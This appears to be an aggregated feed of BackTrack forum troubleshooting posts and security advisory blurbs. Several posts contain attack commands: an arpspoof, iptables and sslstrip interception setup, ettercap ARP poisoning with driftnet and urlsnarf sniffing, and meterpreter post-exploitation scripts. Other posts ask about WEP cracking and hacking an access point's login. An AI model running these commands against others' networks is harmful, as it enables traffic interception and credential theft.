bonsoir ... j'ai deux problème avec le live-cd de backtrack 4 ... lorsque je lance le livecd j'ai acces au terminal ou il faut écrire "startx" pour lance le mode graphique ,ayant une carte graphique ati qui n'est donc pas supporté par backtrack 4 je ne peut pas avoir avec au bureau ,j'ai donc fouiné impeut sur le web et j'ai vue que l'on pouvait télécharger les drivers ati directement en lancent la commande apt-get install ati je crois enfin je ne sait pas quoi faire pour avoir soit internet soit mes drivers ati pour pouvoir utiliser backtrack pleinement ,si vous avec des questions ou des solution je suis a votre écoute ,mercis
-
-
7:47
»
Hack a Day
[Mr.X] added support for four controllers to his Super Nintendo (Google translated) by internalizing the multi-player adapter. In the video after the break you’ll notice that he also added some bling to the case by positioning the power LED beneath the logo and adding a two-digit display. There is a switch on the back that [...]
-
-
4:21
»
remote-exploit & backtrack
Hello there,
(I used the board search, before :) )
So, i have one question:
Is there a tool on backtrack that supports faster password recovery via solid state disk and rainbowtables? Because i read of special prepared rainbowtables (on h-online[dot]com), which are able to have a better performance in recovering NTLM passwords.
Thanks in advance,
tiger
-
-
18:37
»
SecuriTeam
A vulnerability was discovered in Microsoft Windows Help and Support Center that could Allow Remote Code Execution.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
20:01
»
Packet Storm Security Tools
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
20:00
»
Packet Storm Security Recent Files
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
-
3:01
»
Packet Storm Security Advisories
CA Technologies support is alerting users to multiple security risks with the PSFormX and WebScan ActiveX controls previously available from the CA Global Security Advisor site. Multiple vulnerabilities exist that can potentially allow a remote attacker to execute arbitrary code.
-
-
0:00
»
Packet Storm Security Recent Files
CA's support is alerting customers to a security risks with CA ARCserve Backup. A vulnerability exists that can potentially allow a local attacker to gain sensitive information.
-
0:00
»
Packet Storm Security Advisories
CA's support is alerting customers to a security risks with CA ARCserve Backup. A vulnerability exists that can potentially allow a local attacker to gain sensitive information.
-
-
8:06
»
remote-exploit & backtrack
I just installed kde4 using synaptic, but kde3 seems to still be everythings default.
System options, themes, window manager, everything is still kde3.
How can I remove kde3 completely?
-
-
9:11
»
remote-exploit & backtrack
This may be more of a kde issue but it is doubtful.
after running apt-get install openoffice.org-core I have no openoffice in my kmenu to launch i dont want to have to load openoffice programs from command line
thanks to anyone who can help
-
-
4:09
»
remote-exploit & backtrack
Hi,
I have just create BT4 on my HDD using the install.sh on the desktop.
Everything worked fine. Booting and BT4 is working.
But the
Hibernate ("suspend to disk") does not work.
"suspend to RAM" does work well, but to DISK its doesn't.
What should I do?
thanks
dani
-
-
12:00
»
Hack a Day
On April first Sony rolled out new firmware for the PlayStation 3 that removed the ability to install Linux on the system by blocking a feature called OtherOS. Now a class action lawsuit has been filed against the company for its actions. It doesn’t take an attorney to figure out that they removed features that [...]
-
-
7:55
»
remote-exploit & backtrack
I am having issues booting backtrack from grub4dos on a NTFS partition. Is this possible? It boots but then pauses at the following screen..
well I cant post links until i have posted 15 times..
basically it says
Loading, please wait...
sd 6:0:0:0: [sdc] Assuming drive cache: write through
sd 6:0:0:0: [sdc] Assuming drive cache: write through
It just freezes here.
-
-
17:01
»
Packet Storm Security Tools
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
17:01
»
Packet Storm Security Recent Files
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
-
22:00
»
Packet Storm Security Tools
sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
-
8:23
»
remote-exploit & backtrack
hey guys i need help in this any one have any idea about how does Access Point Web-Based login works and how to hack that ? i want to know how does exactly that work ?and as well as to hack it
-
-
21:55
»
SecuriTeam
Potential security vulnerabilities have been identified with HP ProLiant Support Pack 8.30 for Windows.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
20:00
»
Packet Storm Security Recent Files
CA's support is alerting customers to multiple security risks with CA XOsoft products. Multiple vulnerabilities exist that can allow a remote attacker to gain sensitive information, cause a denial of service, or possibly execute arbitrary code. CA has issued patches to address the vulnerabilities.
-
20:00
»
Packet Storm Security Advisories
CA's support is alerting customers to multiple security risks with CA XOsoft products. Multiple vulnerabilities exist that can allow a remote attacker to gain sensitive information, cause a denial of service, or possibly execute arbitrary code. CA has issued patches to address the vulnerabilities.
-
-
14:00
»
remote-exploit & backtrack
Hi,
Opened the Backtrack 4 Final Imagem in VMWare Fusion (mac) and everything seems ok but the resolution.
The maximum it allows is 1024x768 witch is not the native screen resolution.
Already tried to reinstall the vmware-tools but no differences.
Thank you in advance
-
13:45
»
remote-exploit & backtrack
Bonsoir !
Je voudrais savoir si AWUS036NH fonctionne avec un backtrack et si oui lequelle ?!
Merci d'avance!;)
-
4:20
»
remote-exploit & backtrack
Ok, upon testing Metasploit and not getting sessions when I should have been, I have concluded it may have something to do with Port forwarding not being enabled.
I know how to forward ports, type 192.168.xx.x into my browser, supply my login details, and then go to port forwarding and configure, however my only unsurity is, officly i have two different Ip's between my primary OS machine and my VM machine when I switch onto backtrack, example my OS ip is 192.168.xx.xx and my BT IP is 10.0.2.xx so when i Type 192.168.xx.x into my primary OS browser and forward ports will the changes apply when I boot my Backtrack also, or is a different process required for that?Hope you can provide some clarity.
-
-
14:25
»
remote-exploit & backtrack
Hey guys, I'm trying to figure out how to ssh into a Metasploit reverse tcp handler running on my home machine. I case that's a little confusing, I have a machine on my home network with a Metasploit handler running. I can ssh into the box, but I'd like to be able to control that specific console. I don't know if this is possible or not and lots of searching hasn't gotten me anywhere, so here I am... Any help would be appreciated :)
-
-
15:38
»
remote-exploit & backtrack
I am using a laptop and it has a Broadcom network adapter.
When I open Kismet, it says something like "no networks detected".
What can I do to make it detect networks? There are plenty of networks, including mine in the area. If you need any more information, let me know. If you need information from a terminal, tell me what to type.
also, how would you connect to a wireless network? the program in the internet menu that says something like network manager does not open.
-
-
17:47
»
remote-exploit & backtrack
Hi
To me, some metasploit auxilliary/modules of oracle such as oracle_login, dbms_export_extension don't work any more.
The warnings are such as "OCI" error (ruby-oci8). Even though I've successfully installed it in new fresh Ubuntu ruby, I can't still run oracle modules
According to my knowledge, BT4 has already had ->
metasploit com/redmine/projects/framework/wiki/OracleUsage
Metasploit Framework - OracleUsage - Metasploit Redmine Interface
Any ideas?
-
13:06
»
remote-exploit & backtrack
I am wondering if I am able to install from standard Ubuntu 9.10 or 10.04 (when released) Repositories on a BackTrack 4 (final) Hard Drive install? I want to use BackTrack4 as my primary OS, but I am guessing I may want some other programs that I use from the Ubuntu Repositories as well. I would like to install them from the Repositories for consistency, if possible. So basically I am asking if I add Ubuntu repositories into BackTrack4, will they work and/or will I run into any major issues? I know its Ubuntu based, but wasn't sure if the kernel was different or other issues which may cause serious issues.
Thanks,
Sparky
-
5:30
»
remote-exploit & backtrack
I ran bt3 on my laptop it works except for sound and i cant start a network tried the /etc/init.d/networking start and nothing, i tried bt4 final i get a fatal error no screens found etc.... on startx but wireless and lan work i ran it after startx failed. iam using a laptop with ati mobility radeon hd5470. what should if do, its weird that the older version is able to run with my graphics card but in the new one it wont.
thanks
-
-
18:49
»
remote-exploit & backtrack
whenever i put certain commands into the konsole that use my interface wlan0 i'll get this error message :
Code:
root@bt:~# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
it just started happening in bt4, to get it to work again i have to disconnect the adapeter and reconnect it.
im assuming it's only doing this when i connect to my router by iwconfig wlan0 mode managed essid.. .... . .. ..
and when i disconnect it of course im disconnected from the router but im able to airodump-ng plus other things i couldnt.
does this message mean my adapter can't multi task or something?
-
15:46
»
remote-exploit & backtrack
Hello, when i type startx i get the following error:
Fatal server error: no screens found
i tryed "sudo dpkg-reconfigure xserver-xorg" but it doesnt work.
I have a notebook with an i5 M 540 and an ATI Mobile Radeon HD 5650
Its an EasyNote TJ75 notebook of Packard bell 6gb ram. My Screen-res: 1366x768
What now`?
-
-
0:58
»
remote-exploit & backtrack
Hi guys,
I've slackware 64 bit installed in partition sda1.
The BT4's installation is in sda3.
Now, if I install GRUB from BT4, I can boot BT4 without problem... but I can't boot Slackware (I can see it, but if I start nothing happens).
Same with Slackware, after installing LILO and added BT4 I can boot slackware but not backtrack (this time, I start BT and it hangs on USB devices, I have nothing attacched and it seems like it stops at the card reader).
I've acer aspire 5735z
I used BT for a long time without problem, this is the first time that I dual - boot.
Hope you can help!
Thanks
-
-
15:19
»
remote-exploit & backtrack
I recently installed BackTrack 4 on my macbook pro. While the installation for backtrack completed successfully, the mac side had an error. When partitioning the hard drive, I made the BackTrack 4 the root and left the mac side of the hard drive to the default that it had been set at. After installing BackTrack the mac side of the computer was not seen. When looking at the partition in BackTrack I saw that the mac side was not recognizable. I do not think the partition was wiped clean, but at the same time, I have no idea how to get it back and running. Any help is greatly appreciated!
-
11:44
»
remote-exploit & backtrack
i type xrandr to see resolutions and it sais minimum 640x480 and max 800x600 but my monitor supports up to 1280x1024 and when i type xrandr -s 1280x1024 it says it cant find it on supported modes.
how to i change it above 800x600??
-
9:24
»
remote-exploit & backtrack
in bt3 it used to work fine but now im having some problems with them.
i have 3 scripts i just plug in when i want to network sniff
its:
Code:
ettercap -T -q -p -M ARP // //
Code:
driftnet -a -d /root/pics -s -p -i wlan0
Code:
urlsnarf -i wlan0
ettercap doesnt even want to start. it will say listening on eth0 for some reason and then this stuff and then FATAL: MITM attacks can't be used on unconfigured interfaces.
as for driftnet and urlsnarf, they dont even sniff the network! they only grab pictures and urls from the pages i visit on that computer.
is there something wrong here? something i need to install or what?
thanks for replies.
-
-
19:55
»
Packet Storm Security Recent Files
CA's support is alerting customers to security risks with CA ARCserve Backup. The version of JRE shipped with ARCserve Backup is potentially susceptible to multiple vulnerabilities and has also reached end of life. Support is providing JRE 1.6 upgrades as remediation.
-
19:54
»
Packet Storm Security Advisories
CA's support is alerting customers to security risks with CA ARCserve Backup. The version of JRE shipped with ARCserve Backup is potentially susceptible to multiple vulnerabilities and has also reached end of life. Support is providing JRE 1.6 upgrades as remediation.
-
-
5:51
»
remote-exploit & backtrack
Hello everyone my keyboard was working fine then all of a sudden it started acting up. Now when I boot into linux the keyboard works fine till I start the Xsever. At first I thought that the keyboard stopped working so I restarted it and still had the same problem. I ended up restarting it 8 times then I finally got pissed off and started to hit the keyboard now when I was done hitting it I kinda kept my hand on it and noticed it still types but I have to hold it for a long period of time for it to start typing. I have to hold the button for like 1-2 Sec for it to type one letter. Then i checked the keyboard setting and they where fine so any suggestions would be great.
Please Please get back to me on this I really don't want to reinstall it.
-
1:57
»
remote-exploit & backtrack
hi bt users
i am trying to give my username at login prompt as
bt login: root
i get a response incorrect login
how do i go around this
presently i am typing this thread via recovery mode which gave me a root shell and also took my password
why am i not allowed in normal login?
-
-
7:11
»
remote-exploit & backtrack
i have d-link dwl 2100 ap connected to biquied patch using low-loss coxial cable it works like charm can this be done to usb dongle so that i can put the antenna which comes with the dongle far to get better range or to extend it.if yes how long the coxial cable should be.the usb dongle gives 20 dbm connected 2 dbi omni antenna.?
if that can't be done.i have d-link dwl-2100 ap it acts as repeater also but thing is that you should put the root wep. i need to crack the root acess point wep.using my acess point as repeater then seat near my acess point with dongle connected to laptop.(the root acess point is mine) i have to do that.i wanna do this for eductianal perpose only. not for illegeal activites so i'm wondering is there a way to do that? if it works great .
is there a way since d-link have site serveuy ....site serveuy acts like airodump-ng in wifi . i'm trying to find a way to crack wep using the acesspoint since it have site servey (like airodump-ng in wifi)so can that be done?if yes how?if yes give me hints and i will do the rest,since d-link ap-2100 support injection and get good range.all devices are mine i wanna try them on myself to help you guyz latly i will do thread about some new ideas i tested and it work i will do them till i finish some stuff(school).
-
-
13:05
»
remote-exploit & backtrack
jai installer windows 7 64bit et jai essayer plusieur version de driver pour mon alfa AWUS036H et rien functionne jai toujours en bas a droite un petit ecran avec un x rouge, et des fois 1 fois sur 100 je reussi a connecter mais 5 seconde apres le petit ecran avec le x rouge revien pour me dire aucune connection est disponible.
functionne tres bien sur mon windows xp.
quelqun connais le probleme avec windows 7 64 bit et AWUS06H
merci
-
9:05
»
remote-exploit & backtrack
hey guys, last night i tried to to try chntpw in backtrack 4 pre final when i wanna do the following step i must first mount my drive so i did so but it say to me permission denied.i also tryed to go to start>start menue>then to storge media then i reload it then i can see my partions ,i tryed to enter were windows is installed and a box poped up and telled me an error and told me to try command to mount it.i type it it's code:mount -t ntfs-3g /dev/sda1.............(i don't remmber all the command) and then it's says permission denied....i also entered the command code : df
it shows the drive and mounted on what i saw my windows partion and mounted in /media/sda1
i tryed to do the chntpw -i ...........................the mounted drive and were is the SAM file located it also says permission denied
i locked users in both f8 safe mode (adminstrator) and my other user i wanna rest them using this tool to see how it work help plz
-
-
9:04
»
remote-exploit & backtrack
I'm trying to create a standard user account since sometimes I do some work that doesn't require root. However, for some reason it doesn't seem to create the home directory for the user. I've tried
useradd -d /home/username username
and it creates the user just fine, /etc/passwd shows that the home directory should be as listed, but when you visit /home no directories are listed.
Furthermore, when I log in with the user and run startx, the desktop shows all items in / , as if / is the current home directory.
Does anyone know what the problem is? I tried just doing a simple mkdir /home/username as well to make the directory, but then other errors come up saying some files are missing in the directory for the user. I imagine if useradd creates the home directory, it would create all necessary files as well. However, it's just not creating it.
Also, I did notice that in addition to the home directory not being correct, when logged into KDE the menu wasn't nice either. There was no backtrack menu item with all the tools organized well - instead they are all in a lost+found menu item, but there are so many they don't all fit on the screen. Is there an easy way to get the menu working the same for additional users as it does for root?
Any ideas?
-
-
3:25
»
remote-exploit & backtrack
:mad:
Hi Guys ,
I have Windows Vista as my base operating system , then I loaded VMware and then downloaded the BT4 Final release.
My Lan card is a Intel(R) 82567LM Gigabit Network Connection. Then VMware has created 2 VMware Network Adapters.
I have tried the following to get the LAN working in BT4
1.I have tried setting the card to NAT , using the VMWARE program settings
2. Also tried using the custom settings choosing the vmware adapters.
3.tried using the ifconfig commands to assign an ipadress to the card manually.
Surely this shouldnt be that complicated ? What am I doing wrong here, can someone assist me please.
Thank you
-
-
18:08
»
remote-exploit & backtrack
Hey all, i recently downloaded the bt4-final.iso from backtrack-linux.org and burnt the image to a dvd+r.
I can boot the live cd fine, the problem is when i go to install it through the ubiquity installer i can get through
the entire install setup (i set the partitioner to use the entire disk) then click reboot.
The system begins to power down and when i am prompted to remove the disk from the tray and
press enter the disk doesn't eject. I'm not sure if that's a problem or not so when the system starts
to power back up from the reboot i eject it manually let it continue its boot sequence.
The system then boots to the grub boot loader. (I don't see the need for this in my situation because
im using the entire hard disk, and when i installed pre-final it didn't install grub and worked fine.)
Anyways to cut to the chase when the system boots to grub and i choose a option like bt4 final frame buffer 1024x768
grub gives me a error code 15:cannot find file...or something like that.
Is there any way to just not install grub so that it just boots bt4?
thanks in advance. ;D
-
-
12:45
»
remote-exploit & backtrack
Hello everyone I can't seem to find a good place to help me with VOIP testing. The reason I'm interested in VOIP is because I have three computers on my home network that use Magicjack and Skype. Now all I'm asking if someone can point me the right direction.
Thanks for your time.....
-
-
0:16
»
remote-exploit & backtrack
Bonjour à tous,
Après plusieurs semaines de recherche intensive : pas moyen de trouver une solution.Je me permet donc de créer un nouveau topic car à mon avis je ne suis pas le seul.
Symptômes : Impossible d'obtenir une adresse DHCP d'un routeur (box) dés que la connexion se fait en crypté (j'ai fait des test en open = OK en WEP = NOK).
Pourtant, le réseau est démarré, la carte ALFA est reconnue : je peux m'associer à une AP (mais pas d'ip) et je peux aussi injecter, détecter tous les réseaux alentours etc ...
Bref je peux tout faire SAUF intégrer le réseau...
J'ai essayé avec WICD, WIFI Radar et Networkmanager rien à faire (la commande dhclient ne donne rien non plus)...
J'ai essayé de décharger (airdriver-ng unload 35) et de recharger le driver rtl8187 rien à faire ...
JE me demande si il ne s'agit pas d'un prob au niveau WPA-Supplicant ...
MErci d em'aider car je nage totalement là ...
Précision : Même résultat sous BT PreFinal , parcontre je me connecte sans prob avec une distrib' Ubuntu 7.10.
-
-
19:45
»
remote-exploit & backtrack
The monitor keeps going black til i move the mouse every 10 minutes, i cant find anywhere where to turn that off, getting really annoying while trying to watch a movie? Anyone know where the settings for that is?
-
-
7:35
»
remote-exploit & backtrack
Bonjour à tous,
je souhaiterai installé backtrack 4 sur clé usb. Je sais que le 3 je peu l'installer sur une clé usb de 2 go mais backtrack 4 je ne sais pas :( ...
j'aimerai sur 4go, es-ce possible? sinon il faut 8 go ? je parle d'une installation complète comme si c'était un disque dur...
Merci d'avance !
-
-
22:19
»
remote-exploit & backtrack
My buddy is a computer science major and he set up 2 Wireless Networks Chiba1 and Chiba2, they have atleast 35% connectivity within a 10mile radius, when I airodump it shows him and his other comp using ALOT of bandwidth, but when you try to connect it always says limited connectivity!
Anyone else come across something like this before, got any suggestions, Its encryption is set to OPN, he said I wouldnt be able to figure out how he did it?
-
21:00
»
Packet Storm Security Recent Files
CA's support is alerting customers to a security risk with CA SiteMinder. Multiple cross site scripting (XSS) vulnerabilities exist that can allow a remote attacker to potentially gain sensitive information. CA has provided guidance to remediate the vulnerability.
-
21:00
»
Packet Storm Security Advisories
CA's support is alerting customers to a security risk with CA SiteMinder. Multiple cross site scripting (XSS) vulnerabilities exist that can allow a remote attacker to potentially gain sensitive information. CA has provided guidance to remediate the vulnerability.
-
14:30
»
remote-exploit & backtrack
naja wollte huet mal ein apt-get update machen und bekam folgende meldung
Quote:
root@bt:~# apt-get update
Err SUN Backtrack Linux Repository pwnsauce Release.gpg
Could not resolve 'archive.offensive-security.com'
Reading package lists... Done
W: Failed to fetch http://archive.offensive-security.co...ce/Release.gpg Could not resolve 'archive.offensive-security.com'
W: Some index files failed to download, they have been ignored, or old ones used instead.
W: You may want to run apt-get update to correct these problems
|
sry für die frühe veröffentlichung
ich nehme mal an das die server down sind zu wartungszwecken
ok war noch nicht mim inet verbunden
aber trotzdem harte lösung um das problem zu beheben
-
-
9:33
»
remote-exploit & backtrack
How can i do this?
Is there such a program that can do this?
Of course the sudo apt-get command wont work (sudo apt-get install rar unrar)
I tried to install winrar but i get this error
Code:
rar: /lib/libc.so.6: version `GLIBC_2.7' not found (required by rar)
Can anyone help?
Thanks.
-
-
6:04
»
remote-exploit & backtrack
Bonjours à tous,
J'utilise de plus en plus cowpatty pour les rainbow tables sur du wpa. Le seul truc c'est que c'est long à générer une table (mieux vaut télécharger pour les SSID communs). Mais faut bien que j'en génère quelques unes aussi.
Seulement genpmk ne gère pas le multi curs et je me demandait : si je lance 4 commandes genpmk en même temps sur une même table, pour le même ssid, en ayant splité ma wordlist est-ce que cela ne va pas créer des problèmes d'intégrité dans ma table ?
Car avec 4 processus mes 4 curs sont exploités.
Pour l'instant j'ai lancé les 4 genpmk et ça à l'air de fonctionner mais la table serat-elle exploitable après ?
Merci
-
-
11:43
»
remote-exploit & backtrack
Hi
I have successfully install my hd5970 double GPU.
I can run pyrit only on the first of GPU, because if I use both GPU result in error
link to discussion hxxp://code.google.com/p/pyrit/issues/detail?id=123
Lukas (pyrit's developper) suggested me to change the source code of cpyrit.py line 375 from
Code:
for dev_idx in range(p.numDevices):
to
Code:
for dev_idx in range(p.numDevices)[:2]:
and now
Code:
root@bt:~# pyrit benchmark
Pyrit 0.3.1-dev (svn r228) (C) 2008-2010 Lukas Lueg hxxp://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (36830.8 PMKs/s)... /
Computed 35963.01 PMKs/s total.
#1: 'OpenCL-Device 'Cypress'': 32751.7 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2)': 520.0 PMKs/s (RTT 2.8)
#3: 'CPU-Core (SSE2)': 493.9 PMKs/s (RTT 2.8)
#4: 'CPU-Core (SSE2)': 498.5 PMKs/s (RTT 2.8)
#5: 'CPU-Core (SSE2)': 519.9 PMKs/s (RTT 2.9)
#6: 'CPU-Core (SSE2)': 484.0 PMKs/s (RTT 3.0)
#7: 'CPU-Core (SSE2)': 530.6 PMKs/s (RTT 3.1)
#8: 'CPU-Core (SSE2)': 476.9 PMKs/s (RTT 2.9)
My second GPU apparently is not working under pyrit. Now I'm trying to figure out whether it is a hardware failure or not and my question is if anyone can successfully run pyrit on ati hd5970 using both GPU
-
-
22:19
»
remote-exploit & backtrack
I have been out of the loop for about a year now. About 20min ago I installed BT4 on VM player 3.0.1 Everything seems to work fine. Sadly I have been damned to Windows 7 as a host OS at work. I would like to use the LAN eth0 for surfing on the host OS (Windows 7) while I am using BT4 final in the VM using my Alfa AWUS036H 500mW to connect to another AP. For some reason BT inherits the host IP. I take it this has something to do with NAT. Anybody know how this is fixed?
-
19:17
»
remote-exploit & backtrack
hi. also ich hab auf meinem neuen laptop wieder BT4 als paralleles OS installiert. alles wunderbar und funktioniert so wie ich es brauche, bis auf die grafikkarte..
verbaut ist im laptop eine ATI Mobility Radeon HD5730 für die es weder für windows noch für linux einen treiber vom hersteller gibt (konnt es auch nicht glauben, aber anderes thema).
um jetzt den typischen posts zuvorzukommen: ja ich kenne gidf.de, ich habe auch schon im forum gesucht (nicht nur in diesem) und ansich die letzten tage nicht viel anderes gemacht, als nach eine lösung für das problem gesucht ;)
standardauflösung ist 1024x768 sobald ich den xserver starte. soweit so gut. mein laptop hat einen 16" screen mit einer möglichen auflösung von 1366x768, welche ich auch gerne nutzen würde, bzw das arbeiten mit der standardauflösung auf dauer sehr mühselig ist.
3D unterstützung total egal, es muss also kein treiber von ATI sein ich brauche einfach nur eine höhere auflösung bzw den entscheidenden rat wie ich diese einstelle :)
also in einem anderen forum hab ich den tip gefunden bei neueren chipsätzen den ATI 10.1 treiber zu verwenden. leider ohne erfolg. es wird keine unterstützte karte gefunden.
die xorg.conf per hand anzupassen hab ich auch schon in mehreren anläufen hinter mir, allerdings muss ich sagen dass ich da nicht so extrem firm bin.
dpkg --reconfigure xserver-xorg bringt keinen erfolg da nur das tastaturlayout angepasst wird
bin also für vorschläge jeder art offen und poste natürlich auch alles was für eine lösungsfindung benötigt wird.
mfg, cit
-
12:29
»
remote-exploit & backtrack
None of the built in meterpreter scripts in my BT4 installation work. I get this error when I try to run any of them:
meterpreter > run killav
[-] Error in script: ActiveRecord::ConnectionNotEstablished ActiveRecord::ConnectionNotEstablished
meterpreter > run vnc
[-] Error in script: ActiveRecord::ConnectionNotEstablished ActiveRecord::ConnectionNotEstablished
meterpreter > run metsvc
[-] Error in script: ActiveRecord::ConnectionNotEstablished ActiveRecord::ConnectionNotEstablished
Has anyone seen this before or have any ideas?
Thanks,
C
-
-
20:59
»
remote-exploit & backtrack
One simple Question. I have a dell inspiron b130 notebook it has a IPW 2200 wireless card. Can I hack a wep network with BT4 final?? Thats all I want to know
-
0:48
»
remote-exploit & backtrack
sslstrip is failing when used in a proxy environment. For example, all the clients on LAN use someserver:8080 as their web proxy. I'm starting sslstrip with the following commands:
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 8080 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo "1" > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 [gateway ip]
sslstrip -w debug.log -k -p -l 10000
Clients hang when trying to use SSL websites. The debug log contains repetitions of:
Quote:
2010-02-04 14:55:47,663 Sending request via HTTP...
2010-02-04 14:55:47,670 Server connection failed.
2010-02-04 14:55:47,670 Retrying via SSL
2010-02-04 14:55:47,674 Server connection failed.
2010-02-04 14:55:47,678 Sending request via HTTP...
2010-02-04 14:55:47,723 Server connection failed.
2010-02-04 14:55:47,723 Retrying via SSL
2010-02-04 14:55:47,729 Server connection failed.
2010-02-04 14:55:47,732 Sending request via HTTP...
2010-02-04 14:55:47,735 Server connection failed.
2010-02-04 14:55:47,735 Retrying via SSL
2010-02-04 14:55:47,814 Sending request via HTTP...
2010-02-04 14:55:47,899 Sending request via HTTP...
2010-02-04 14:55:47,955 Sending request via HTTP...
2010-02-04 14:55:47,964 Sending request via HTTP...
2010-02-04 14:55:47,974 Sending request via HTTP...
2010-02-04 14:55:48,047 Sending request via HTTP...
2010-02-04 14:55:48,059 Sending request via HTTP...
2010-02-04 14:55:48,062 Server connection failed.
2010-02-04 14:55:48,062 Retrying via SSL
2010-02-04 14:55:50,218 Sending request via HTTP...
|
Any ideas what might solve this issue?
-
-
14:35
»
remote-exploit & backtrack
currenly i have done nothing to my driver but i would like to know if i would need to patch or change my driver for better support with backtrack 4 final i will also be changing the tx power today and if i need to do anything to my driver im curently using rtl8187.injeting works but if i use to attacks at the same time pps decrease.
-
11:38
»
remote-exploit & backtrack
i have a his radeon hd 4830 which i want to set the resolution to 1920 1080 and i currently have backtrack 4 final installed on my hdd. if i run it on a virtual machine i have the option to change it to that resolution, but know installed in my hdd i cant set it that high.
-
6:02
»
remote-exploit & backtrack
Bonjour tout le monde,
je viens d'acheter un Pavillon DV6 et quand j'arrive à la commande "startx" il me met un écran noir pendant même pas une seconde et il m'affiche ça :
X : warning; process set to priority -1 instead of request prioriti 0.
et plus bas :
Xinit : Connection refused (errno111): unable to connect to X server
Xinit : No such process (errno3): Server error.
Merci de m'aider s'il vous plait backtrack me manque :(
Merci d'avance !
-
-
19:39
»
remote-exploit & backtrack
I recently purchased a new laptop with an Atheros AR9285 802.11b/g/n wireless card. I'm having a bit of trouble getting monitor mode / promiscuous mode working in wireshark.
First, I checked that it should be supported. I'm fairly certain monitor mode should work with this card using the ath9k driver.
Here are steps I have taken and results:
/usr/bin/start-network <- start it so I can use wicd
WICD - can connect to network no problem, using WPA
In wireshark, I can see a couple of things.
1. I can view a ton of management / beacon frames. Not really interested in these.
2. I can view traffic from local PC when connected to my network
3. I cannot view other traffic, even though I have promiscous mode checked in Wireshark.
I tried manually setting the card to monitor mode
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig <- shows it is indeed in monitor mode
With it manually set, Wicd manager does not show anything, so I cannot connect to my own network. In wireshark (prom. mode still set)
1. Can see plenty of beacon frames still.
2. Cannot view my local PC traffic, obviously, as I am not connected to a network and cannot generate any.
3. Still cannot view any other traffic from other PCs. (Yes, I have another laptop and am generating traffic, so I know it exists)
Next, I thought it must be a driver issue, although I don't think any of the following changed anything (up until now, using default BackTrack 4 Final drivers - is it using ath9k ? Seems like it was). So, I proceeded to install latest driver...
1. downloaded driver compat-wireless.2.6.tar.bz2
2. extracted, make, make install
3. make unload (unload current modules, BT4 shows ath9k unloaded, so I assume it used that by default so reinstalling probably didn't do anything)
4. modprobe ath9k (start up ath9k module, which should work for AR9285)
After doing that, nothing changed. Same results as before. Does anyone have any ideas for my next step? ath9k says all supported devices (which should include AR9285) should work in monitor mode, but it just isn't working for me. I'm able to put it into monitor mode, and Wireshark doesn't complain (in Windows, Wireshark tells me it failed to put device in promiscuous mode), but I just don't see the results...
-
18:36
»
remote-exploit & backtrack
trying to use the ettercap for my wireless card instead of the RJ-45 port. My wireless card is set to eth1. RJ-45 port is eth0. I typed in ettercap -T -q -M ARP // // eth1. And even tried ettercap -T -q -M ARP // // eth0. the RJ-port works fine and I can poison my network. I just need it to be wireless instead of running a cord everywhere.
Plz HELP!
Thanks,
Jon
-
-
18:00
»
Packet Storm Security Recent Files
CA's support is alerting customers to a security risk with CA eHealth Performance Manager. A cross-site scripting vulnerability exists that can allow a remote attacker to potentially gain sensitive information. CA has provided guidance to remediate the vulnerability.
-
18:00
»
Packet Storm Security Advisories
CA's support is alerting customers to a security risk with CA eHealth Performance Manager. A cross-site scripting vulnerability exists that can allow a remote attacker to potentially gain sensitive information. CA has provided guidance to remediate the vulnerability.
-
-
6:30
»
remote-exploit & backtrack
Hello i have one question.How can i check length of password or encryption wpa/wep/64/128/256bit.Tnx:confused:
-
-
10:52
»
remote-exploit & backtrack
Hi,
I'm thinking about installing BT4 on my eee pc.
My problem is that that I have 2GB of HD and 4GB of SD.
How can I partition all to fit BT4 final?
Thanks
-
-
18:47
»
remote-exploit & backtrack
I tried the guide here
but everytime I try and install the ati driver I get
(Reading database ... 226943 files and directories currently installed.)
Unpacking ati-driver (from .../ati-driver_9.5-bt2_i386.deb) ...
Replacing files in old package libgl1-mesa-glx ...
Replacing files in old package xserver-xorg-core ...
dpkg: error processing /var/cache/apt/archives/ati-driver_9.5-bt2_i386.deb (--unpack):
trying to overwrite `/usr/lib/libGL.so', which is also in package libgl1-mesa-dev
Processing triggers for man-db ...
Errors were encountered while processing:
/var/cache/apt/archives/ati-driver_9.5-bt2_i386.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)
root@bt:~#
this worked before on my machine runnin backtrack pre final, but now its not. I tried removing the driver, but it gives the same error. This happens if I try running this before I startx and afterwords. I've tried installing the backtrack-ati drivers, but same error. What am I doing wrong?
-
-
2:27
»
remote-exploit & backtrack
Bonjour à tous,
Je viens d'installer BT4 F sur mon PC et il se trouve que quand je lance le gestionnaire d'application j'ai ce message d'erreur
Failed to check for installed and available applications
Quote:
